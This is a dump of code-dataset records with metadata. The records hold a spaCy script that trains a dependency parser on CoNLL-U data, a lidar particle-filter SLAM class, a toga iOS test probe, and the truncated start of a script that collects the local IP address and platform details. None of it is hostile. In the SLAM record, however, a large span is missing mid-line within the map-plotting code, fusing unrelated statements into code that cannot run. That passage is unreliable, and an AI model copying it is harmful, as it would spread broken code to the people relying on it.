iob), [])]\n tuples.append((text, sents))\n return tuples\n\ndef split_text(text):\n return [par.strip().replace('\\n', ' ')\n for par in text.split('\\n\\n')]\n \n\ndef read_data(nlp, conllu_file, text_file, raw_text=True, oracle_segments=False,\n limit=None):\n '''Read the CONLLU format into (Doc, GoldParse) tuples. If raw_text=True,\n include Doc objects created using nlp.make_doc and then aligned against\n the gold-standard sequences. If oracle_segments=True, include Doc objects\n created from the gold-standard segments. At least one must be True.'''\n if not raw_text and not oracle_segments:\n raise ValueError(\"At least one of raw_text or oracle_segments must be True\")\n paragraphs = split_text(text_file.read())\n conllu = read_conllu(conllu_file)\n # sd is spacy doc; cd is conllu doc\n # cs is conllu sent, ct is conllu token\n docs = []\n golds = []\n for doc_id, (text, cd) in enumerate(zip(paragraphs, conllu)):\n doc_words = []\n doc_tags = []\n doc_heads = []\n doc_deps = []\n doc_ents = []\n for cs in cd:\n sent_words = []\n sent_tags = []\n sent_heads = []\n sent_deps = []\n for id_, word, lemma, pos, tag, morph, head, dep, _1, _2 in cs:\n if '.' in id_:\n continue\n if '-' in id_:\n continue\n id_ = int(id_)-1\n head = int(head)-1 if head != '0' else id_\n sent_words.append(word)\n sent_tags.append(tag)\n sent_heads.append(head)\n sent_deps.append('ROOT' if dep == 'root' else dep)\n if oracle_segments:\n sent_heads, sent_deps = projectivize(sent_heads, sent_deps)\n docs.append(Doc(nlp.vocab, words=sent_words))\n golds.append(GoldParse(docs[-1], words=sent_words, heads=sent_heads,\n tags=sent_tags, deps=sent_deps,\n entities=['-']*len(sent_words)))\n for head in sent_heads:\n doc_heads.append(len(doc_words)+head)\n doc_words.extend(sent_words)\n doc_tags.extend(sent_tags)\n doc_deps.extend(sent_deps)\n doc_ents.extend(['-']*len(sent_words))\n # Create a GoldParse object for the sentence\n doc_heads, doc_deps = projectivize(doc_heads, doc_deps)\n if raw_text:\n docs.append(nlp.make_doc(text))\n golds.append(GoldParse(docs[-1], words=doc_words, tags=doc_tags,\n heads=doc_heads, deps=doc_deps,\n entities=doc_ents))\n if limit and doc_id >= limit:\n break\n return docs, golds\n\n\ndef refresh_docs(docs):\n vocab = docs[0].vocab\n return [Doc(vocab, words=[t.text for t in doc],\n spaces=[t.whitespace_ for t in doc])\n for doc in docs]\n\n\ndef read_conllu(file_):\n docs = []\n doc = None\n sent = []\n for line in file_:\n if line.startswith('# newdoc'):\n if doc:\n docs.append(doc)\n doc = []\n elif line.startswith('#'):\n continue\n elif not line.strip():\n if sent:\n if doc is None:\n docs.append([sent])\n else:\n doc.append(sent)\n sent = []\n else:\n sent.append(line.strip().split())\n if sent:\n if doc is None:\n docs.append([sent])\n else:\n doc.append(sent)\n if doc:\n docs.append(doc)\n return docs\n\n\ndef parse_dev_data(nlp, text_loc, conllu_loc, oracle_segments=False,\n joint_sbd=True):\n with open(text_loc) as text_file:\n with open(conllu_loc) as conllu_file:\n docs, golds = read_data(nlp, conllu_file, text_file,\n oracle_segments=oracle_segments)\n if joint_sbd:\n pass\n else:\n sbd = nlp.create_pipe('sentencizer')\n for doc in docs:\n doc = sbd(doc)\n for sent in doc.sents:\n sent[0].is_sent_start = True\n for word in sent[1:]:\n word.is_sent_start = False\n scorer = nlp.evaluate(zip(docs, golds))\n return docs, scorer\n\n\ndef print_progress(itn, losses, scorer):\n scores = {}\n for col in ['dep_loss', 'tag_loss', 'uas', 'tags_acc', 'token_acc',\n 'ents_p', 'ents_r', 'ents_f', 'cpu_wps', 'gpu_wps']:\n scores[col] = 0.0\n scores['dep_loss'] = losses.get('parser', 0.0)\n scores['ner_loss'] = losses.get('ner', 0.0)\n scores['tag_loss'] = losses.get('tagger', 0.0)\n scores.update(scorer.scores)\n tpl = '\\t'.join((\n '{:d}',\n '{dep_loss:.3f}',\n '{ner_loss:.3f}',\n '{uas:.3f}',\n '{ents_p:.3f}',\n '{ents_r:.3f}',\n '{ents_f:.3f}',\n '{tags_acc:.3f}',\n '{token_acc:.3f}',\n ))\n print(tpl.format(itn, **scores))\n\ndef print_conllu(docs, file_):\n for i, doc in enumerate(docs):\n file_.write(\"# newdoc id = {i}\\n\".format(i=i))\n for j, sent in enumerate(doc.sents):\n file_.write(\"# sent_id = {i}.{j}\\n\".format(i=i, j=j))\n file_.write(\"# text = {text}\\n\".format(text=sent.text))\n for k, t in enumerate(sent):\n if t.head.i == t.i:\n head = 0\n else:\n head = k + (t.head.i - t.i) + 1\n fields = [str(k+1), t.text, t.lemma_, t.pos_, t.tag_, '_',\n str(head), t.dep_.lower(), '_', '_']\n file_.write('\\t'.join(fields) + '\\n')\n file_.write('\\n')\n\n\ndef main(spacy_model, conllu_train_loc, text_train_loc, conllu_dev_loc, text_dev_loc,\n output_loc):\n nlp = load_model(spacy_model)\n vec_nlp = spacy.util.load_model('spacy/data/en_core_web_lg/en_core_web_lg-2.0.0')\n nlp.vocab.vectors = vec_nlp.vocab.vectors\n for lex in vec_nlp.vocab:\n _ = nlp.vocab[lex.orth_]\n with open(conllu_train_loc) as conllu_file:\n with open(text_train_loc) as text_file:\n docs, golds = read_data(nlp, conllu_file, text_file,\n oracle_segments=False, raw_text=True,\n limit=None)\n print(\"Create parser\")\n nlp.add_pipe(nlp.create_pipe('parser'))\n nlp.parser.add_multitask_objective('tag')\n nlp.parser.add_multitask_objective('sent_start')\n nlp.add_pipe(nlp.create_pipe('tagger'))\n for gold in golds:\n for tag in gold.tags:\n if tag is not None:\n nlp.tagger.add_label(tag)\n optimizer = nlp.begin_training(lambda: golds_to_gold_tuples(docs, golds))\n # Replace labels that didn't make the frequency cutoff\n actions = set(nlp.parser.labels)\n label_set = set([act.split('-')[1] for act in actions if '-' in act])\n for gold in golds:\n for i, label in enumerate(gold.labels):\n if label is not None and label not in label_set:\n gold.labels[i] = label.split('||')[0]\n n_train_words = sum(len(doc) for doc in docs)\n print(n_train_words)\n print(\"Begin training\")\n # Batch size starts at 1 and grows, so that we make updates quickly\n # at the beginning of training.\n batch_sizes = spacy.util.compounding(spacy.util.env_opt('batch_from', 1),\n spacy.util.env_opt('batch_to', 8),\n spacy.util.env_opt('batch_compound', 1.001))\n for i in range(30):\n docs = refresh_docs(docs)\n batches = minibatch(list(zip(docs, golds)), size=batch_sizes)\n with tqdm.tqdm(total=n_train_words, leave=False) as pbar:\n losses = {}\n for batch in batches:\n if not batch:\n continue\n batch_docs, batch_gold = zip(*batch)\n\n nlp.update(batch_docs, batch_gold, sgd=optimizer,\n drop=0.2, losses=losses)\n pbar.update(sum(len(doc) for doc in batch_docs))\n \n with nlp.use_params(optimizer.averages):\n dev_docs, scorer = parse_dev_data(nlp, text_dev_loc, conllu_dev_loc,\n oracle_segments=False, joint_sbd=True)\n print_progress(i, losses, scorer)\n with open(output_loc, 'w') as file_:\n print_conllu(dev_docs, file_)\n dev_docs, scorer = parse_dev_data(nlp, text_dev_loc, conllu_dev_loc,\n oracle_segments=False, joint_sbd=False)\n print_progress(i, losses, scorer)\n\n\nif __name__ == '__main__':\n plac.call(main)\n", "sub_path": "examples/training/conllu.py", "file_name": "conllu.py", "file_ext": "py", "file_size_in_byte": 11809, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.seed", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random.random.seed", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.random", "line_number": 23, "usage_type": "name"}, {"api_name": "spacy.util.get_lang_class", "line_number": 49, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "spacy._align.align", "line_number": 69, "usage_type": "name"}, {"api_name": "spacy._align.align", "line_number": 70, "usage_type": "name"}, {"api_name": "spacy.syntax.nonproj.projectivize", "line_number": 130, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 131, "usage_type": "call"}, {"api_name": "spacy.gold.GoldParse", "line_number": 132, "usage_type": "call"}, {"api_name": "spacy.syntax.nonproj.projectivize", "line_number": 142, "usage_type": "call"}, {"api_name": "spacy.gold.GoldParse", "line_number": 145, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 155, "usage_type": "call"}, {"api_name": "spacy.util.load_model", "line_number": 252, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 252, "usage_type": "attribute"}, {"api_name": "spacy.util.compounding", "line_number": 283, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 283, "usage_type": "attribute"}, {"api_name": "spacy.util.env_opt", "line_number": 283, "usage_type": "call"}, {"api_name": "spacy.util.env_opt", "line_number": 284, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 284, "usage_type": "attribute"}, {"api_name": "spacy.util.env_opt", "line_number": 285, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 285, "usage_type": "attribute"}, {"api_name": "spacy.gold.minibatch", "line_number": 288, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 289, "usage_type": "call"}, {"api_name": "plac.call", "line_number": 312, "usage_type": "call"}]} +{"seq_id": "23865486", "text": "#*\n# SLAM.py: the implementation of SLAM\n# created and maintained by Ty Nguyen\n# tynguyen@seas.upenn.edu\n# Feb 2020\n#*\n# from google.colab.patches import cv2_imshow\nfrom scipy.special import logsumexp\n\nimport numpy as np\nfrom numpy import cos,sin\nimport matplotlib.pyplot as plt\nimport load_data as ld\nimport os, sys, time\nimport p3_util as ut\nfrom read_data import LIDAR, JOINTS\nimport probs_utils as prob\nimport math\nimport cv2\nimport transformations\nfrom importlib import reload\nreload(transformations)\nimport transformations as tf\nfrom copy import deepcopy\nfrom mpl_toolkits.mplot3d import Axes3D\nimport logging\nif (sys.version_info > (3, 0)):\n import pickle\nelse:\n import cPickle as pickle\n\nlogger = logging.getLogger()\nlogger.setLevel(os.environ.get(\"LOGLEVEL\", \"INFO\"))\ninterval = 1\n\nclass SLAM(object):\n def __init__(self):\n self._characterize_sensor_specs()\n \n def _read_data(self, src_dir, dataset=0, split_name='train'):\n self.dataset_= str(dataset)\n if split_name.lower() not in src_dir:\n src_dir = src_dir + '/' + split_name\n print('\\n------Reading Lidar and Joints (IMU)------')\n self.lidar_ = LIDAR(dataset=self.dataset_, data_folder=src_dir, name=split_name + '_lidar'+ self.dataset_)\n print ('\\n------Reading Joints Data------')\n self.joints_ = JOINTS(dataset=self.dataset_, data_folder=src_dir, name=split_name + '_joint'+ self.dataset_)\n \n self.num_data_ = len(self.lidar_.data_)\n # Position of odometry\n self.odo_indices_ = np.empty((2,self.num_data_),dtype=np.int64)\n lidar_data = self.lidar_.data_\n # remove bias for odometry, init pose is (0,0,0)\n yaw_bias = lidar_data[0]['rpy'][0,2]\n pose_bias = lidar_data[0]['pose'][0,:2]\n for i in range(len(lidar_data)):\n lidar_data[i]['rpy'][0,2] -= yaw_bias\n lidar_data[i]['pose'][0,:2] -= pose_bias\n self.lidar_.data_ = lidar_data\n def _characterize_sensor_specs(self, p_thresh=None):\n # High of the lidar from the ground (meters)\n self.h_lidar_ = 0.93 + 0.33 + 0.15\n # Accuracy of the lidar\n self.p_true_ = 9\n self.p_false_ = 1.0/9\n \n #TODO: set a threshold value of probability to consider a map's cell occupied \n self.p_thresh_ = 0.6 if p_thresh is None else p_thresh # > p_thresh => occupied and vice versa\n # Compute the corresponding threshold value of logodd\n self.logodd_thresh_ = prob.log_thresh_from_pdf_thresh(self.p_thresh_)\n \n\n def _init_particles(self, num_p=100, mov_cov=None, particles=None, weights=None, percent_eff_p_thresh=None):\n # Particles representation\n self.num_p_ = num_p\n #self.percent_eff_p_thresh_ = percent_eff_p_thresh\n self.particles_ = np.zeros((3,self.num_p_),dtype=np.float64) if particles is None else particles\n \n # Weights for particles\n self.weights_ = 1.0/self.num_p_*np.ones(self.num_p_) if weights is None else weights\n\n # Position of the best particle after update on the map\n self.best_p_indices_ = np.zeros((2,self.num_data_),dtype=np.int64)\n #self.best_p_indices_[:,0] = np.zeros(2)\n # Best particles\n self.best_p_ = np.zeros((3,self.num_data_))\n #self.best_p_[:,0] = np.zeros(3)\n # Corresponding time stamps of best particles\n self.time_ = np.empty(self.num_data_)\n \n # Covariance matrix of the movement model\n tiny_mov_cov = np.array([[1e-8, 0, 0],[0, 1e-8, 0],[0, 0 , 1e-8]])\n self.mov_cov_ = mov_cov if mov_cov is not None else tiny_mov_cov\n # To generate random noise: x, y, z = np.random.multivariate_normal(np.zeros(3), mov_cov, 1).T\n # this return [x], [y], [z]\n\n # Threshold for resampling the particles\n self.percent_eff_p_thresh_ = percent_eff_p_thresh\n\n def _init_map(self, map_resolution=0.05):\n '''*Input: resolution of the map - distance between two grid cells (meters)'''\n # Map representation\n MAP= {}\n MAP['res'] = map_resolution #meters\n MAP['xmin'] = -30 #meters\n MAP['ymin'] = -30\n MAP['xmax'] = 30\n MAP['ymax'] = 30\n MAP['sizex'] = int(np.ceil((MAP['xmax'] - MAP['xmin']) / MAP['res'] + 1)) #total cells\n MAP['sizey'] = int(np.ceil((MAP['ymax'] - MAP['ymin']) / MAP['res'] + 1)) #total cells\n belief = 0.7\n MAP['occ_d'] = np.log(belief/(1-belief))\n MAP['free_d'] = np.log((1-belief)/belief)*.5\n occ_thres = 0.9\n free_thres = 0.2\n MAP['occ_thres'] = prob.log_thresh_from_pdf_thresh(occ_thres)\n MAP['free_thres'] = prob.log_thresh_from_pdf_thresh(free_thres)\n MAP['bound'] = 100 # allow log odds recovery\n MAP['map'] = np.zeros((MAP['sizex'],MAP['sizey']),dtype=float) #DATA TYPE: char or int8\n # MAP['map'] = np.random.randint(-100,100,size=[MAP['sizex'],MAP['sizey']]).astype(float)\n self.MAP_ = MAP\n\n self.log_odds_ = np.zeros((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.float64)\n self.occu_ = np.ones((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.float64)\n # Number of measurements for each cell\n self.num_m_per_cell_ = np.zeros((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.uint64)\n\n\n def _build_first_map(self,t0=0,use_lidar_yaw=True):\n \"\"\"Build the first map using first lidar and plot it\"\"\"\n self.t0 = t0\n # Extract a ray from lidar data, transform it to x-y-z frame\n print('\\n--------Doing build the first map--------')\n lidar_idx = t0\n lidar_scan = self.lidar_.data_[lidar_idx]['scan']\n num_beams = lidar_scan.shape[1]\n lidar_angles = np.linspace(start=-135*np.pi/180, stop=135*np.pi/180, num=num_beams).reshape(1,-1)\n Pose = self.particles_[:, np.argmax(self.weights_)]\n selected_range = np.logical_and(lidar_scan>0.1, lidar_scan<30) # lidar spec\n lidar_scan_seleted_range = lidar_scan[selected_range]\n lidar_angles_selected_range = lidar_angles[selected_range]\n x_lidar = lidar_scan_seleted_range * cos(lidar_angles_selected_range)\n y_lidar = lidar_scan_seleted_range * sin(lidar_angles_selected_range)\n z_lidar = np.zeros(len(lidar_scan_seleted_range))\n lidar_selected_hit = np.vstack((x_lidar,y_lidar,z_lidar))# 3*n\n\n # find closest joint data(synchronization)\n joint_idx = np.argmin(np.abs(self.joints_.data_['ts']-self.lidar_.data_[lidar_idx]['t']))\n joint_angles = self.joints_.data_['head_angles'][:,joint_idx]\n\n # transform hit from lidar to world coordinate, also remove ground hitting\n world_hit = tf.lidar2world(lidar_selected_hit, joint_angles,self.lidar_.data_[lidar_idx]['rpy'][0,:],pose=Pose)\n occ = tf.world2map(world_hit[:2],self.MAP_)\n # update log odds for occupied grid, Note: pixels access should be (column, row)\n self.MAP_['map'][occ[1], occ[0]] += self.MAP_['occ_d']-self.MAP_['free_d'] # will add back later\n # update log odds for free grid, using contours to mask region between pose and hit\n mask = np.zeros(self.MAP_['map'].shape)\n contour = np.hstack((tf.world2map(Pose[:2],self.MAP_).reshape(-1,1), occ))\n cv2.drawContours(image=mask, contours = [contour.T], contourIdx = -1, color = self.MAP_['free_d'], thickness=-1)\n self.MAP_['map'] += mask\n # keep log odds within boundary, to allow recovery\n self.MAP_['map'][self.MAP_['map']>self.MAP_['bound']] = self.MAP_['bound']\n self.MAP_['map'][self.MAP_['map']<-self.MAP_['bound']] = -self.MAP_['bound']\n # print(self.MAP_['map'])\n\n # plot the first map\n h, w = self.MAP_['map'].shape\n Plot = np.zeros((h,w,3),np.uint8)\n # Trajectory = []\n occ_mask = self.MAP_['map']>self.MAP_['occ_thres']\n free_mask = self.MAP_['map']ilk', world_2_body_rots, d_xy_in_body))\n self.particles_[2] += d_theta\n # print('t=',t,'particle=',self.particles_)\n # apply noise, set or use tiny_cov\n self.mov_cov_ = np.array([[0.001,0,0],[0,0.001,0],[0,0,0.001]])\n noise = np.random.multivariate_normal(np.zeros(3), self.mov_cov_, size=self.num_p_).T\n # # self.particles_[:2] += np.squeeze(np.einsum('ijk,ik->jk', world_2_body_rots, noise[:2]))\n # # self.particles_[2] += noise[2]\n self.particles_ += noise # slightly incorrect but faster??\n # print('add noise')\n # print(f't={t},self.particles_={self.particles_}')\n\n def _update(self,t,t0=0,fig='on'):\n if t == t0:\n self._build_first_map(t0,use_lidar_yaw=True)\n return\n else:\n #######################################################################################\n # UPDATE MAP\n ######################################################################################\n lidar_scan = self.lidar_.data_[t]['scan']\n num_beams = lidar_scan.shape[1]\n lidar_angles = np.linspace(start=-135*np.pi/180, stop=135*np.pi/180, num=num_beams).reshape(1,-1)\n selected_range = np.logical_and(lidar_scan>0.1, lidar_scan<30) # lidar spec\n # print('selected range=',np.where(selected_range==False))\n lidar_scan_seleted_range = lidar_scan[selected_range]\n lidar_angles_selected_range = lidar_angles[selected_range]\n x_lidar = lidar_scan_seleted_range * cos(lidar_angles_selected_range)\n y_lidar = lidar_scan_seleted_range * sin(lidar_angles_selected_range)\n z_lidar = np.zeros(len(lidar_scan_seleted_range))\n lidar_selected_hit = np.vstack((x_lidar,y_lidar,z_lidar))# 3*n\n # find closest joint data(synchronization)\n joint_idx = np.argmin(np.abs(self.joints_.data_['ts']-self.lidar_.data_[t]['t']))\n joint_angles = self.joints_.data_['head_angles'][:,joint_idx]\n # transform hit from lidar to world coordinate, also remove ground hitting\n self.best_p_[:,t] = self.particles_[:,np.argmax(self.weights_)]\n # print(f't={t},pose={self.best_p_[:,t]}')\n world_hit = tf.lidar2world(lidar_selected_hit, joint_angles,self.lidar_.data_[t]['rpy'][0,:], pose=self.best_p_[:,t])\n # print('t=',t,'world_hit=',world_hit)\n occ = tf.world2map(world_hit[:2],self.MAP_)\n # update log odds for occupied grid, Note: pixels access should be (column, row)\n self.MAP_['map'][occ[1], occ[0]] += self.MAP_['occ_d']-self.MAP_['free_d'] # will add back later\n # update log odds for free grid, using contours to mask region between pose and hit\n mask = np.zeros(self.MAP_['map'].shape)\n best_particle_map = tf.world2map(self.best_p_[:2,t],self.MAP_).reshape(-1,1)\n contour = np.hstack((best_particle_map, occ))\n cv2.drawContours(image=mask, contours = [contour.T], contourIdx = -1, color = self.MAP_['free_d'], thickness=-1)\n self.MAP_['map'] += mask\n # keep log odds within boundary, to allow recovery\n self.MAP_['map'][self.MAP_['map']>self.MAP_['bound']] = self.MAP_['bound']\n self.MAP_['map'][self.MAP_['map']<-self.MAP_['bound']] = -self.MAP_['bound']\n # print('map=',np.where(self.MAP_['map']>0))\n ############################################################################################\n #UPDATE PARTICLES\n ############################################################################################\n # convert each particle into world frame\n particles_hit = tf.lidar2world(lidar_selected_hit,joint_angles,self.lidar_.data_[t]['rpy'][0,:],Particles=self.particles_)\n # get matching between map and particle lidar reading\n corr = np.zeros(self.num_p_)\n for i in range(self.num_p_):\n occ = tf.world2map(particles_hit[:2,:,i], self.MAP_)\n corr[i] = np.sum(self.MAP_['map'][occ[1],occ[0]]>self.MAP_['occ_thres'])\n corr /= 10 # by divide, adding a temperature to the softmax function\n # update particle weights\n log_weights = np.log(self.weights_) + corr\n log_weights -= np.max(log_weights) + logsumexp(log_weights - np.max(log_weights))\n # print(f'log_weights={log_weights}')\n self.weights_ = np.exp(log_weights)\n self.best_p_[:,t] = self.particles_[:,np.argmax(self.weights_)]\n occ = tf.world2map(self.best_p_[:2,t],self.MAP_)\n self.best_p_indices_[:,t] = np.array([occ[1,0],occ[0,0]])\n\n # print(f'best_p_indices={self.best_p_indices_[:,t]}')\n MAP = self.MAP_\n return MAP\n \n", "sub_path": "code/SLAM/SLAM.py", "file_name": "SLAM.py", "file_ext": "py", "file_size_in_byte": 14785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "importlib.reload", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 27, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 33, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 33, "usage_type": "attribute"}, {"api_name": "read_data.LIDAR", "line_number": 45, "usage_type": "call"}, {"api_name": "read_data.JOINTS", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 51, "usage_type": "attribute"}, {"api_name": "probs_utils.log_thresh_from_pdf_thresh", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 113, "usage_type": "call"}, {"api_name": "probs_utils.log_thresh_from_pdf_thresh", "line_number": 116, "usage_type": "call"}, {"api_name": "probs_utils.log_thresh_from_pdf_thresh", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.uint64", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 148, "usage_type": "call"}, {"api_name": "transformations.lidar2world", "line_number": 152, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 158, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 168, "usage_type": "attribute"}, {"api_name": "numpy.logical_not", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.logical_or", "line_number": 172, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random.multivariate_normal", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 211, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 228, "usage_type": "attribute"}, {"api_name": "numpy.logical_and", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 241, "usage_type": "call"}, {"api_name": "transformations.lidar2world", "line_number": 243, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 249, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 251, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 252, "usage_type": "call"}, {"api_name": "transformations.lidar2world", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 271, "usage_type": "call"}, {"api_name": "scipy.special.logsumexp", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 274, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 276, "usage_type": "call"}]} +{"seq_id": "140062919", "text": "import asyncio\n\nfrom toga.fonts import CURSIVE, FANTASY, MONOSPACE, SANS_SERIF, SERIF, SYSTEM\nfrom toga_iOS.libs import NSRunLoop\n\n\nclass BaseProbe:\n def assert_font_family(self, expected):\n assert self.font.family == {\n CURSIVE: \"Apple Chancery\",\n FANTASY: \"Papyrus\",\n MONOSPACE: \"Courier New\",\n SANS_SERIF: \"Helvetica\",\n SERIF: \"Times New Roman\",\n SYSTEM: \".AppleSystemUIFont\",\n }.get(expected, expected)\n\n async def redraw(self, message=None, delay=None):\n \"\"\"Request a redraw of the app, waiting until that redraw has completed.\"\"\"\n # If we're running slow, wait for a second\n if self.app.run_slow:\n print(\"Waiting for redraw\" if message is None else message)\n delay = 1\n\n if delay:\n await asyncio.sleep(delay)\n else:\n # Running at \"normal\" speed, we need to release to the event loop\n # for at least one iteration. `runUntilDate:None` does this.\n NSRunLoop.currentRunLoop.runUntilDate(None)\n", "sub_path": "iOS/tests_backend/probe.py", "file_name": "probe.py", "file_ext": "py", "file_size_in_byte": 1083, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "toga.fonts.CURSIVE", "line_number": 10, "usage_type": "name"}, {"api_name": "toga.fonts.FANTASY", "line_number": 11, "usage_type": "name"}, {"api_name": "toga.fonts.MONOSPACE", "line_number": 12, "usage_type": "name"}, {"api_name": "toga.fonts.SANS_SERIF", "line_number": 13, "usage_type": "name"}, {"api_name": "toga.fonts.SERIF", "line_number": 14, "usage_type": "name"}, {"api_name": "toga.fonts.SYSTEM", "line_number": 15, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "toga_iOS.libs.NSRunLoop.currentRunLoop.runUntilDate", "line_number": 30, "usage_type": "call"}, {"api_name": "toga_iOS.libs.NSRunLoop.currentRunLoop", "line_number": 30, "usage_type": "attribute"}, {"api_name": "toga_iOS.libs.NSRunLoop", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "2716278", "text": "import socket\nimport platform\nimport requests\nimport json\n\n\ndef get_IP():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('8.8.8.8', 0))\n IP = s.getsockname()[0]\n except:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\ndef basic_information():\n\tInformacje = {\n\t\t\t\t\t\t\t'Distro' : platform.system(), \n\t\t\t\t\t\t\t'Release' : platform.release(), \n\t\t\t\t\t\t\t'Version' : platform.version(),\n\t\t\t\t\t\t\t'Processor' : 